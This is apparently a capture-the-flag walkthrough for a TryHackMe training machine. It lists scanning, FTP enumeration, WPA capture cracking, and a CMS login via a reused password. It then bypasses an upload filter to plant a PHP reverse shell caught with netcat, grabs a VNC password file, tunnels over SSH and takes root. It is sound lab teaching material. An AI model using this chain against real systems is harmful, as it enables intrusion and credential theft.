Room link - https://tryhackme.com/jr/superspamr
(Note to tester: the machine needs more resources to speed up this time)
This machine can take 5-10 minutes to setup.
Good luck Have fun solving it :)
-
rustscan -a 10.10.103.218
We can see 5 open ports 80, 4012, 4019, 5901 and 6001
Lets use NMAP to perform version detection
nmap -sV 10.10.103.218 -p 80,4012,4019,5901,6001 -T4
Port 80 = HTTP
Port 4012 = SSH
Port 4019 = FTP
Port 5901 = VNC
nmap -A -p 80 -T4 ip
-
Lets login in FTP with anonymous
ftp 10.10.103.218 4012
We can see a
note.txt
We can see on line of 13th January that adam has included a Wireshark file
Lets do a
ls -ato see if there are any hidden files
Yes!! We were right
There is a hidden directory called
.capLets navigate into that directory and check its contents
We can see a file called SamsNetwork.cap, we can download on our machine.
-rwxr--r-- 1 ftp ftp 370488 Feb 20 14:46 SamsNetwork.capget SamsNetwork.cap- To download it in our machine.
It is now downloaded in our machine. Lets use aircrack-ng to crack it.
aircrack-ng SamsNetwork.cap -w /path/to/rockyou.txtAfter some time we can see that it successfully cracked the password.
Password : [REDACTED]
Now we have a password!!
-
Lets check out the website.
Lets try finding username's in the website
Click on Blog
After viewing all the blogs, I found these usernames
- Adam_Admin
- Benjamin_Blogger
- Donald_dump
- Lucy_Loser
We have 1 password and 4 users. Let's try logging in.
Scroll all the way down
After trying the password for all user's. We can see the the password [REDACTED] works for the user [REDACTED].
After login we can see this page.
http://ip/concrete5/index.php/dashboard/welcomeNow just change the url to
ip
Scroll a bit down and click on any of them.
You will see these button's on the top right
Click on
And you will see this
Click on File Manager under Files section
You will see a site like this
Click on upload fileUpload a PHP revserse shell. You can find it here.
Download this on your machine and change the ip address in it using a text edittor
Now lets upload this in the website and set up a listener on our machine :
nc -lvnp 1234(replace 1234 with the port you have changed in the php reverse shell script)
Looks like
.phpextension is an invalid extensionLets fix that.
Add
, phpat the end
Click on Save
Now lets try to upload again
Click on
Upload Fileson the top right
Boom!! Its successfull!
Now lets click
close.Now set up a listener
nc -lvnp 1234(replace 1234 with the port you have changed in the php reverse shell script)
After you click on that link. You will get a reverse shell.
Lets upgrade our shell by using
python3 -c 'import pty;pty.spawn("/bin/bash")'
Navigate to
/home/personal.There are a lot of files
To find the user flag we need to
grepthrough all the files -cat * | grep flag
Now go to
/home/lucy_loserand list the files
We see an hidden directory
.MessagesBackupToGalactic. Let's navigate to that folder and view files
We can see a lot of
png, a python file and anote.txt
Lets download all the
pngs to our machine using a python3 http server -python3 -m http.server 2222. Remember to run it in while you are in the.MessagesBackupToGalacticfolder.
To get it on your machine follow these steps
wget ip:2222/c1.png wget ip:2222/c2.png wget ip:2222/c3.png wget ip:2222/c4.png wget ip:2222/c5.png wget ip:2222/c6.png wget ip:2222/c7.png wget ip:2222/c8.png wget ip:2222/c9.png wget ip:2222/xored.pyNow Lets run the
xored.pyscript. For it to work you would need PILLOW installedpip3 install pillowLets run the script.
It requires 2 png files. After trying a lot i found out
c2.pngandc8.pngworked
Lets view our newly made file
c28.png[redacted]
We can find a password
After trying each user i found out the we could use the user
donalddumpto login using that password.
Let's SSH into donalddump
ssh donalddump@ip -p 4012and password which you found in the image
Lets browse in our home directory
Permission denied - Lets try to change the permissions of the
/home/donalddump-chmod 777 /home/donalddump
Now we remember we had VNCviewer running as we found in our nmap scan.
Lets try to gain root using that
Grab VNC passwd file from donaldump's directory
Transfer this using
python3 -m http.server 1234On your machine -
wget ip:1234/passwd
Do port forwarding with ssh as you know donald_dump's password ,
ssh -L 5901:localhost:5901 donalddump@ip -p 4012
Note : Make sure you have VNCviewer installed, if not please install it using this link.
Or install it using:
sudo apt install tigervnc-viewerRun -
vncviewer -passwd passwd_file ip::5901on your machine.- passwd_file was the one we transfered from Superspam to our machine which was in the donalddump home directory.
Let's change the root password and then log in as root from
sshpasswd
I changed the password to
1234Lets do
su rootin the donalddump ssh shell
We see a unusual hidden directory called
.nothingLets browse in it and check its content.
We see a
r00t.txtfile. Lets get the contents of the file -cat r00t.txt
By copying the what am i? string and paste it in CyberChef
Now we get the decoded string which has the root flag!
Root_flag: flag{REDACTED}
-